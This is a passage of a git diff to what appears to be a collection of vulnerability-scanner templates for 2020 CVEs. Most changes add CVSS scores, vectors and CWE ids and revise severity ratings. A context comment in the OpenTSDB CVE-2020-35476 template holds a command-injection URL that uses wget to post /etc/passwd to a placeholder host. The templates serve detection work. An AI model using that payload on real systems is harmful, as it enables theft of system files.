CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-25078 requests: diff --git a/cves/2020/CVE-2020-25213.yaml b/cves/2020/CVE-2020-25213.yaml index f2553035ef..67e680d764 100644 --- a/cves/2020/CVE-2020-25213.yaml +++ b/cves/2020/CVE-2020-25213.yaml @@ -12,6 +12,11 @@ info: # Uploaded file will be accessible at:- # http://localhost/wp-content/plugins/wp-file-manager/lib/files/poc.txt + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-25213 + cwe-id: CWE-434 requests: - raw: diff --git a/cves/2020/CVE-2020-25223.yaml b/cves/2020/CVE-2020-25223.yaml index 21cf8027b4..adcb65ac0a 100644 --- a/cves/2020/CVE-2020-25223.yaml +++ b/cves/2020/CVE-2020-25223.yaml @@ -8,6 +8,10 @@ info: reference: - https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223 tags: cve,cve2020,sophos,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-25223 requests: - raw: diff --git a/cves/2020/CVE-2020-25495.yaml b/cves/2020/CVE-2020-25495.yaml index a60c97dbea..5a82ebb9c1 100644 --- a/cves/2020/CVE-2020-25495.yaml +++ b/cves/2020/CVE-2020-25495.yaml @@ -7,6 +7,11 @@ info: severity: medium tags: cve,cve2020,sco,xss reference: https://www.exploit-db.com/exploits/49300 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-25495 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-25506.yaml b/cves/2020/CVE-2020-25506.yaml index d2352c64ac..2ee12a9f60 100644 --- a/cves/2020/CVE-2020-25506.yaml +++ b/cves/2020/CVE-2020-25506.yaml @@ -9,6 +9,11 @@ info: - https://gist.github.com/WinMin/6f63fd1ae95977e0e2d49bd4b5f00675 - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ tags: cve,cve2020,dlink,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-25506 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2020/CVE-2020-2551.yaml b/cves/2020/CVE-2020-2551.yaml index c861f6b44a..348fd0ba52 100644 --- a/cves/2020/CVE-2020-2551.yaml +++ b/cves/2020/CVE-2020-2551.yaml @@ -19,6 +19,10 @@ info: reference: https://github.com/hktalent/CVE-2020-2551 tags: cve,cve2020,oracle,weblogic,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-2551 requests: - method: GET diff --git a/cves/2020/CVE-2020-25540.yaml b/cves/2020/CVE-2020-25540.yaml index 822c9f5ef4..2ff12bd0ef 100644 --- a/cves/2020/CVE-2020-25540.yaml +++ b/cves/2020/CVE-2020-25540.yaml @@ -3,10 +3,15 @@ info: name: ThinkAdmin 6 - Arbitrarily File Read (CVE-2020-25540) author: geeknik - severity: medium + severity: high description: ThinkAdmin v6 is affected by a directory traversal vulnerability. An unauthorized attacker can read arbitrary files on a remote server via GET request encode parameter. reference: https://www.exploit-db.com/exploits/48812 tags: cve,cve2020,thinkadmin,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-25540 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-26153.yaml b/cves/2020/CVE-2020-26153.yaml index fb40209d26..7a0433f16c 100644 --- a/cves/2020/CVE-2020-26153.yaml +++ b/cves/2020/CVE-2020-26153.yaml @@ -10,6 +10,11 @@ info: - https://labs.nettitude.com/blog/cve-2020-26153-event-espresso-core-cross-site-scripting/ - https://nvd.nist.gov/vuln/detail/CVE-2020-26153 tags: cve,cve2020,xss,wordpress,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-26153 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-26214.yaml b/cves/2020/CVE-2020-26214.yaml index d3d76d844b..0ebba2ba0c 100644 --- a/cves/2020/CVE-2020-26214.yaml +++ b/cves/2020/CVE-2020-26214.yaml @@ -11,6 +11,11 @@ info: - https://tools.ietf.org/html/rfc4513#section-5.1.2 - https://pypi.org/project/alerta-server/8.1.0/ tags: cve,cve2020,alerta + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-26214 + cwe-id: CWE-287 requests: - method: GET diff --git a/cves/2020/CVE-2020-26919.yaml b/cves/2020/CVE-2020-26919.yaml index b9efcf09b6..18174b37ea 100644 --- a/cves/2020/CVE-2020-26919.yaml +++ b/cves/2020/CVE-2020-26919.yaml @@ -9,6 +9,10 @@ info: - https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/ - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ tags: cve,cve2020,netgear,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-26919 requests: - raw: diff --git a/cves/2020/CVE-2020-26948.yaml b/cves/2020/CVE-2020-26948.yaml index 54d281ece9..6367027877 100644 --- a/cves/2020/CVE-2020-26948.yaml +++ b/cves/2020/CVE-2020-26948.yaml @@ -7,6 +7,11 @@ info: reference: https://github.com/btnz-k/emby_ssrf description: Emby Server before 4.5.0 allows SSRF via the Items/RemoteSearch/Image ImageURL parameter. tags: cve,cve2020,emby,jellyfin,ssrf + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-26948 + cwe-id: CWE-918 requests: - method: GET diff --git a/cves/2020/CVE-2020-27361.yaml b/cves/2020/CVE-2020-27361.yaml index cc00677a99..800de254e4 100644 --- a/cves/2020/CVE-2020-27361.yaml +++ b/cves/2020/CVE-2020-27361.yaml @@ -7,6 +7,11 @@ info: description: An issue exists within Akkadian Provisioning Manager 4.50.02 which allows attackers to view sensitive information within the /pme subdirectories. reference: https://www.blacklanternsecurity.com/2021-07-01-Akkadian-CVE/ tags: cve,cve2020,akkadian,listing,exposure + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-27361 + cwe-id: CWE-668 requests: - method: GET diff --git a/cves/2020/CVE-2020-27735.yaml b/cves/2020/CVE-2020-27735.yaml index 31b0f18651..dc84ec8031 100644 --- a/cves/2020/CVE-2020-27735.yaml +++ b/cves/2020/CVE-2020-27735.yaml @@ -8,6 +8,11 @@ info: An XSS issue was discovered in Wing FTP 6.4.4. An arbitrary IFRAME element can be included in the help pages via a crafted link, leading to the execution of (sandboxed) arbitrary HTML and JavaScript in the user's browser. reference: https://nvd.nist.gov/vuln/detail/CVE-2020-27735 tags: cve,cve2020,xss,wing-ftp + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-27735 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-27866.yaml b/cves/2020/CVE-2020-27866.yaml index cc13503b5f..81151b66a4 100644 --- a/cves/2020/CVE-2020-27866.yaml +++ b/cves/2020/CVE-2020-27866.yaml @@ -11,6 +11,11 @@ info: - https://www.zerodayinitiative.com/advisories/ZDI-20-1451/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27866 - https://kb.netgear.com/000062641/Security-Advisory-for-Password-Recovery-Vulnerabilities-on-Some-Routers + classification: + cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-27866 + cwe-id: CWE-288 requests: - raw: diff --git a/cves/2020/CVE-2020-27982.yaml b/cves/2020/CVE-2020-27982.yaml index 91159315d6..f46b932a44 100644 --- a/cves/2020/CVE-2020-27982.yaml +++ b/cves/2020/CVE-2020-27982.yaml @@ -6,6 +6,11 @@ info: description: IceWarp 11.4.5.0 allows XSS via the language parameter. reference: https://packetstormsecurity.com/files/159763/Icewarp-WebMail-11.4.5.0-Cross-Site-Scripting.html tags: cve,cve2020,xss,icewarp + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-27982 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-27986.yaml b/cves/2020/CVE-2020-27986.yaml index dcb73a8bf5..d33b9d2de3 100644 --- a/cves/2020/CVE-2020-27986.yaml +++ b/cves/2020/CVE-2020-27986.yaml @@ -3,13 +3,18 @@ id: CVE-2020-27986 info: name: SonarQube unauth author: pikpikcu - severity: medium + severity: high description: | SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, SVN, and GitLab credentials via the api/settings/values URI. NOTE: reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it." reference: https://csl.com.co/sonarqube-auditando-al-auditor-parte-i/ tags: cve,cve2020,sonarqube + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-27986 + cwe-id: CWE-306,CWE-312 requests: - method: GET diff --git a/cves/2020/CVE-2020-28188.yaml b/cves/2020/CVE-2020-28188.yaml index e511013c53..45c1ee460a 100644 --- a/cves/2020/CVE-2020-28188.yaml +++ b/cves/2020/CVE-2020-28188.yaml @@ -10,6 +10,11 @@ info: - https://www.pentest.com.tr/exploits/TerraMaster-TOS-4-2-06-Unauthenticated-Remote-Code-Execution.html - https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/ tags: cve,cve2020,terramaster,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-28188 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2020/CVE-2020-28208.yaml b/cves/2020/CVE-2020-28208.yaml index e320eb589c..135292b076 100644 --- a/cves/2020/CVE-2020-28208.yaml +++ b/cves/2020/CVE-2020-28208.yaml @@ -7,6 +7,11 @@ info: description: An email address enumeration vulnerability exists in the password reset function of Rocket.Chat through 3.9.1. reference: https://trovent.io/security-advisory-2010-01 tags: cve,cve2020,rockethchat + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-28208 + cwe-id: CWE-203 requests: - raw: diff --git a/cves/2020/CVE-2020-28871.yaml b/cves/2020/CVE-2020-28871.yaml index 4e77e68e53..d8708d874c 100644 --- a/cves/2020/CVE-2020-28871.yaml +++ b/cves/2020/CVE-2020-28871.yaml @@ -10,6 +10,11 @@ info: - https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/ - https://www.exploit-db.com/exploits/48980 tags: cve,cve2020,monitorr,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-28871 + cwe-id: CWE-434 requests: - raw: diff --git a/cves/2020/CVE-2020-28976.yaml b/cves/2020/CVE-2020-28976.yaml index 3ecd474e88..a271437130 100644 --- a/cves/2020/CVE-2020-28976.yaml +++ b/cves/2020/CVE-2020-28976.yaml @@ -3,12 +3,17 @@ id: CVE-2020-28976 info: name: Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated) author: LogicalHunter - severity: high + severity: medium description: The Canto plugin 1.3.0 for WordPress contains a blind SSRF vulnerability. It allows an unauthenticated attacker to make a request to any internal and external server via /includes/lib/detail.php?subdomain=SSRF. reference: - https://www.exploit-db.com/exploits/49189 - https://nvd.nist.gov/vuln/detail/CVE-2020-28976 tags: cve,cve2020,ssrf,wordpress,wp-plugin,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-28976 + cwe-id: CWE-918 requests: - method: GET diff --git a/cves/2020/CVE-2020-29164.yaml b/cves/2020/CVE-2020-29164.yaml index 753c1c727b..9ff125238d 100644 --- a/cves/2020/CVE-2020-29164.yaml +++ b/cves/2020/CVE-2020-29164.yaml @@ -7,6 +7,11 @@ info: severity: medium tags: pacsone,xss,cve,cve2020 reference: https://gist.github.com/leommxj/0a32afeeaac960682c5b7c9ca8ed070d + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-29164 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-29227.yaml b/cves/2020/CVE-2020-29227.yaml index 469d3e038c..b22baeb363 100644 --- a/cves/2020/CVE-2020-29227.yaml +++ b/cves/2020/CVE-2020-29227.yaml @@ -3,12 +3,16 @@ id: CVE-2020-29227 info: name: Car Rental Management System 1.0 - Local File Inclusion (LFI) author: daffainfo - severity: high + severity: critical description: An issue was discovered in Car Rental Management System 1.0. An unauthenticated user can perform a file inclusion attack against the /index.php file with a partial filename in the "page" parameter, to cause local file inclusion resulting in code execution. reference: - https://loopspell.medium.com/cve-2020-29227-unauthenticated-local-file-inclusion-7d3bd2c5c6a5 - https://nvd.nist.gov/vuln/detail/CVE-2020-29227 tags: cve,cve2020,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-29227 requests: - method: GET diff --git a/cves/2020/CVE-2020-29395.yaml b/cves/2020/CVE-2020-29395.yaml index 1072df2e03..ca81ff5115 100644 --- a/cves/2020/CVE-2020-29395.yaml +++ b/cves/2020/CVE-2020-29395.yaml @@ -9,6 +9,11 @@ info: - https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS - https://nvd.nist.gov/vuln/detail/CVE-2020-29395 tags: cve,cve2020,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-29395 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-29453.yaml b/cves/2020/CVE-2020-29453.yaml index 3e39b3447e..447eb86dbf 100644 --- a/cves/2020/CVE-2020-29453.yaml +++ b/cves/2020/CVE-2020-29453.yaml @@ -7,6 +7,11 @@ info: description: The CachingResourceDownloadRewriteRule class in Jira Server and Jira Data Center allowed unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories via an incorrect path access check. reference: https://jira.atlassian.com/browse/JRASERVER-72014 tags: cve,cve2020,atlassian,jira,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-29453 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-3187.yaml b/cves/2020/CVE-2020-3187.yaml index 346ae735d7..10db5b0e82 100644 --- a/cves/2020/CVE-2020-3187.yaml +++ b/cves/2020/CVE-2020-3187.yaml @@ -3,13 +3,18 @@ id: CVE-2020-3187 info: name: CVE-2020-3187 author: KareemSe1im - severity: high + severity: critical description: A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and obtain read and delete access to sensitive files on a targeted system. reference: - https://twitter.com/aboul3la/status/1286809567989575685 - http://packetstormsecurity.com/files/158648/Cisco-Adaptive-Security-Appliance-Software-9.7-Arbitrary-File-Deletion.html - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-path-JE3azWw43 tags: cve,cve2020,cisco + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.10 + cve-id: CVE-2020-3187 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-3452.yaml b/cves/2020/CVE-2020-3452.yaml index 1a5f9d3e7f..5ffc08cf18 100644 --- a/cves/2020/CVE-2020-3452.yaml +++ b/cves/2020/CVE-2020-3452.yaml @@ -3,7 +3,7 @@ id: CVE-2020-3452 info: name: CVE-2020-3452 author: pdteam - severity: medium + severity: high description: | A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files. reference: @@ -14,6 +14,11 @@ info: - http://packetstormsecurity.com/files/160497/Cisco-ASA-9.14.1.10-FTD-6.6.0.1-Path-Traversal.html - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86 tags: cve,cve2020,cisco,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-3452 + cwe-id: CWE-20 requests: - method: GET diff --git a/cves/2020/CVE-2020-35338.yaml b/cves/2020/CVE-2020-35338.yaml index 2470e2c195..205fad22a0 100644 --- a/cves/2020/CVE-2020-35338.yaml +++ b/cves/2020/CVE-2020-35338.yaml @@ -10,6 +10,11 @@ info: - https://jeyaseelans.medium.com/cve-2020-35338-9e841f48defa tags: cve,cve2020,wmt,default-login + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-35338 + cwe-id: CWE-798 requests: - method: GET path: diff --git a/cves/2020/CVE-2020-35476.yaml b/cves/2020/CVE-2020-35476.yaml index a73f95890b..a84417bce6 100644 --- a/cves/2020/CVE-2020-35476.yaml +++ b/cves/2020/CVE-2020-35476.yaml @@ -10,6 +10,11 @@ info: # Extracting /etc/passwd to remote host:- # /q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20--post-file%20/etc/passwd%20http://my-host%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-35476 + cwe-id: CWE-78 requests: - method: GET diff --git a/cves/2020/CVE-2020-35489.yaml b/cves/2020/CVE-2020-35489.yaml index bac1875c05..e183ae1ea7 100644 --- a/cves/2020/CVE-2020-35489.yaml +++ b/cves/2020/CVE-2020-35489.yaml @@ -7,6 +7,11 @@ info: description: The contact-form-7 (aka Contact Form 7) plugin before 5.3.2 for WordPress allows Unrestricted File Upload and remote code execution because a filename may contain special characters. reference: https://nvd.nist.gov/vuln/detail/CVE-2020-35489 tags: cve,cve2020,wordpress,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2020-35489 + cwe-id: CWE-434 requests: - method: GET diff --git a/cves/2020/CVE-2020-35580.yaml b/cves/2020/CVE-2020-35580.yaml index c5fa22a091..1f23d2e4e6 100644 --- a/cves/2020/CVE-2020-35580.yaml +++ b/cves/2020/CVE-2020-35580.yaml @@ -7,6 +7,11 @@ info: description: Local File Inclusion vulnerability in the FileServlet in all SearchBlox before 9.2.2 allows remote, unauthenticated users to read arbitrary files from the operating system via a /searchblox/servlet/FileServlet?col=url= request. Additionally, this may be used to read the contents of the SearchBlox configuration file (e.g., searchblox/WEB-INF/config.xml), which contains both the Super Admin API key and the base64 encoded SHA1 password hashes of other SearchBlox users. reference: https://hateshape.github.io/general/2021/05/11/CVE-2020-35580.html tags: cve,cve2020,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-35580 + cwe-id: CWE-522 requests: - method: GET diff --git a/cves/2020/CVE-2020-35598.yaml b/cves/2020/CVE-2020-35598.yaml index fe1febddde..435cffabbd 100644 --- a/cves/2020/CVE-2020-35598.yaml +++ b/cves/2020/CVE-2020-35598.yaml @@ -9,6 +9,11 @@ info: - https://www.exploit-db.com/exploits/49343 - https://www.cvedetails.com/cve/CVE-2020-35598 tags: cve,cve2020,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-35598 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-35713.yaml b/cves/2020/CVE-2020-35713.yaml index a5e9540ba2..fd466fe1a3 100644 --- a/cves/2020/CVE-2020-35713.yaml +++ b/cves/2020/CVE-2020-35713.yaml @@ -7,6 +7,11 @@ info: reference: https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html description: Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page. tags: cve,cve2020,linksys,rce,oob,router + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-35713 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2020/CVE-2020-35729.yaml b/cves/2020/CVE-2020-35729.yaml index f0af5aa3ab..632c7a5aad 100644 --- a/cves/2020/CVE-2020-35729.yaml +++ b/cves/2020/CVE-2020-35729.yaml @@ -19,6 +19,11 @@ info: Originated from Metasploit module, copyright (c) space-r7. tags: cve,cve2020,klog,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-35729 + cwe-id: CWE-78 requests: - method: POST diff --git a/cves/2020/CVE-2020-35736.yaml b/cves/2020/CVE-2020-35736.yaml index c2bfce5c8b..377a1e0aa0 100644 --- a/cves/2020/CVE-2020-35736.yaml +++ b/cves/2020/CVE-2020-35736.yaml @@ -9,6 +9,11 @@ info: - https://github.com/liftoff/GateOne/issues/747 - https://nvd.nist.gov/vuln/detail/CVE-2020-35736 tags: cve,cve2020,gateone,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-35736 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-35774.yaml b/cves/2020/CVE-2020-35774.yaml index e772c16eec..072b62d728 100644 --- a/cves/2020/CVE-2020-35774.yaml +++ b/cves/2020/CVE-2020-35774.yaml @@ -8,6 +8,11 @@ info: server/handler/HistogramQueryHandler.scala in Twitter TwitterServer (aka twitter-server) before 20.12.0, in some configurations, allows XSS via the /histograms endpoint. reference: https://nvd.nist.gov/vuln/detail/CVE-2020-35774 tags: cve,cve2020,xss,twitter-server + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-35774 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-3580.yaml b/cves/2020/CVE-2020-3580.yaml index af6da1dcfa..8b32f9ef9f 100644 --- a/cves/2020/CVE-2020-3580.yaml +++ b/cves/2020/CVE-2020-3580.yaml @@ -10,6 +10,11 @@ info: description: | Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products section. tags: cve,cve2020,xss,cisco + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-3580 + cwe-id: CWE-79 requests: - raw: diff --git a/cves/2020/CVE-2020-35846.yaml b/cves/2020/CVE-2020-35846.yaml index 35f6119a3c..2cb08ab7d4 100644 --- a/cves/2020/CVE-2020-35846.yaml +++ b/cves/2020/CVE-2020-35846.yaml @@ -9,6 +9,11 @@ info: The $eq operator matches documents where the value of a field equals the specified value. reference: https://swarm.ptsecurity.com/rce-cockpit-cms/ tags: cve,cve2020,nosqli,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-35846 + cwe-id: CWE-89 requests: - method: POST diff --git a/cves/2020/CVE-2020-35847.yaml b/cves/2020/CVE-2020-35847.yaml index 2226a19d6f..9d33adc30f 100644 --- a/cves/2020/CVE-2020-35847.yaml +++ b/cves/2020/CVE-2020-35847.yaml @@ -9,6 +9,11 @@ info: which is responsible for changing the user password using the reset token. reference: https://swarm.ptsecurity.com/rce-cockpit-cms/ tags: cve,cve2020,nosqli,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-35847 + cwe-id: CWE-89 requests: - method: POST diff --git a/cves/2020/CVE-2020-35848.yaml b/cves/2020/CVE-2020-35848.yaml index 9e693b11c7..3b1a7d649a 100644 --- a/cves/2020/CVE-2020-35848.yaml +++ b/cves/2020/CVE-2020-35848.yaml @@ -9,6 +9,11 @@ info: which is responsible for displaying the user password reset form. reference: https://swarm.ptsecurity.com/rce-cockpit-cms/ tags: cve,cve2020,nosqli,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-35848 + cwe-id: CWE-89 requests: - method: POST diff --git a/cves/2020/CVE-2020-35951.yaml b/cves/2020/CVE-2020-35951.yaml index 835ccc29ed..0ab49a2bc9 100644 --- a/cves/2020/CVE-2020-35951.yaml +++ b/cves/2020/CVE-2020-35951.yaml @@ -8,6 +8,11 @@ info: An issue was discovered in the Quiz and Survey Master plugin before 7.0.1 for WordPress. It allows users to delete arbitrary files such as wp-config.php file, which could effectively take a site offline and allow an attacker to reinstall with a WordPress instance under their control. This occurred via qsm_remove_file_fd_question, which allowed unauthenticated deletions (even though it was only intended for a person to delete their own quiz-answer files). reference: https://www.wordfence.com/blog/2020/08/critical-vulnerabilities-patched-in-quiz-and-survey-master-plugin/ tags: cve,cve2020,wordpress,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H + cvss-score: 9.90 + cve-id: CVE-2020-35951 + cwe-id: CWE-306 requests: - raw: diff --git a/cves/2020/CVE-2020-36112.yaml b/cves/2020/CVE-2020-36112.yaml index def510535d..474b9b212a 100644 --- a/cves/2020/CVE-2020-36112.yaml +++ b/cves/2020/CVE-2020-36112.yaml @@ -9,6 +9,11 @@ info: - https://www.tenable.com/cve/CVE-2020-36112 severity: critical tags: cve,cve2020,sqli,cse + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-36112 + cwe-id: CWE-89 requests: - raw: diff --git a/cves/2020/CVE-2020-36289.yaml b/cves/2020/CVE-2020-36289.yaml index 9b1cb65ed5..134c4160f8 100644 --- a/cves/2020/CVE-2020-36289.yaml +++ b/cves/2020/CVE-2020-36289.yaml @@ -9,6 +9,11 @@ info: reference: - https://twitter.com/ptswarm/status/1402644004781633540 - https://nvd.nist.gov/vuln/detail/CVE-2020-36289 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-36289 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2020/CVE-2020-4463.yaml b/cves/2020/CVE-2020-4463.yaml index cff4fd841a..96e904d323 100644 --- a/cves/2020/CVE-2020-4463.yaml +++ 